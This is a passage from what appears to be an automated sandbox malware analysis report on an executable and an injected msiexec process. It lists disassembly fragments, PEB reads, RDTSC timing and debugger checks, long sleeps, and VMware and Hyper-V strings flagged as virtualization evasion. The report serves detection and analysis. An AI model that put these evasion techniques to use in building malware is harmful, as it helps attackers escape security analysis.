          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00415CE7 pushad ; ret
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_0041C4EE push 133511A3h; retf
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00414D71 push ss; iretd
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00415D38 pushad ; ret
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B8D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0440D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A162F6 pushfd ; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A253FC push eax; retf
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A2B3C5 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A25CE7 pushad ; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A2C4EE push 133511A3h; retf
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A2B412 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A2B41B push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A2B47C push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A25D38 pushad ; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A24D71 push ss; iretd
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 0000000002A185F4 second address: 0000000002A185FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 0000000002A1898E second address: 0000000002A18994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_004088C0 rdtsc
          Source: C:\Windows\explorer.exe TID: 5224Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1332Thread sleep time: -46000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: explorer.exe, 00000005.00000000.247668679.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.247668679.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000005.00000000.246941784.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.247439928.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.270829033.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000005.00000000.247668679.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.247668679.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.247849993.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000005.00000000.270872903.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000005.00000000.246941784.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.246941784.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.240221570.0000000004E61000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.247668679.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mic
          Source: explorer.exe, 00000005.00000000.248432954.0000000008907000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&r
          Source: explorer.exe, 00000005.00000000.246941784.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 1_2_021906DA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 1_2_02190A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 1_2_0219099F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 1_2_021909DE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 1_2_021908EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B6F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B39080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BB3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BB3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BCB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00C01074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BF2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00C04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00C04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B50050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B50050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BB69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B62990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B6A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B5C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BC41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B6513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B6513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B54120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B3B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B3B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B3C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B5B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B5B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B4AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B4AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B6FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B6D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B6D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B62AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B62ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00C08A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B53A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B48A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B7927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BEB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BEB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BC4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B6B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BF138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B41B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B41B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043EBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0444C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0444C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04472073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04481074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0448740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0448740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0448740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04436C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04436C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04436C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04436C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043D746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04437016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04437016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04437016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04484015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04484015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043EF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0444B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0444B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0444B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0444B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0444B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0444B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04488CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04436CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04436CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04436CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_044714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04433884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04433884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04433540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043BAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043D4120 mov eax, dword ptr fs:[00000030h]
